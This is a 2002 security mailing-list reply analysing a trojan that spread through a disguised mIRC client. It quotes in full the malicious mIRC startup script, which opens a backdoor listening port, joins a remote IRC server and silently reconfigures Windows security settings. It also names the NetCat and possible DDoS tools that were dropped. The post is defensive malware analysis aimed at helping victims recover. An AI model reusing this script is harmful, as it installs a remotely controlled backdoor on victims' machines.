Re: Q328691 ?

From: Kyle Lai (aladin168at_private)
Date: Wed Sep 11 2002 - 01:48:02 PDT

  • Next message: Loki: "RE: possible ssh hack"

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    In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950@MSXDENUSR01>
    One of the Microsoft PSS Security Specialist contacted me after reading my 
    analysis.  I gave them a copy of the virus/trojan/malware I analyzed, and 
    I also expressed my concern about their analysis.  I did not hear back 
    from them yesterday, but maybe we should give them couple days.  However, 
    I still want to make sure everyone that was infected to run Anti-Trojan 
    software to remove any trojan and hacker tools.  It's detailed in my 
    I did point out that there was a file called "ncp.exe", which in fact was 
    NetCat, one of hacker's favorite tool that could possibly allow a hacker 
    to remote control the victims' systems...  The other one is mt.exe, could 
    be a dDoS agent (not confirmed).  MS is aware of these situations.  Let's 
    make sure all the victims' out there are at least recovering their systems 
    Also, secedit.bat did NOT change the security policies.  "DLL32NT.HLP" was 
    the actual text (mirc script) file that caused the problems...
    Here is the actual script that got run:
    on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run 
    mdm.exe /n /fh         | //set %server | //set %timeout 10 
    | if ($portfree(60609) == $false) { exit } |  if ($portfree(60609) == 
    $true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9) 
    | //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh        
    | //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini 
    NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr 
    | //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini 
    mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r
    (a,z)  |  //timercoolconnect -o 0 100 //server %server 6667 |  //timer 1 
    1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ 
    tftp8675 /quiet |  fos }
    As I looked in further, the "designer" of this trojan/malware used "UPX 
    Executable Packer" from to compact the 
    taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from 
    (1.3M) to 442K.  It also compacted so well, there are very few ASCII 
    characters to read from Hex Editor.  Once you use UPX to decompress it, 
    you can read a lot more.  I am still trying to see if anything was 
    modified.  Please let me know if anyone find anything out there.  I am not 
    sure if the mirc client has been modified...  
    The above script also opened a backdoor port 60609...
    If you have more info, please pass along.
    Kyle Lai, CISSP, CISA
    Kyle Lai Consulting
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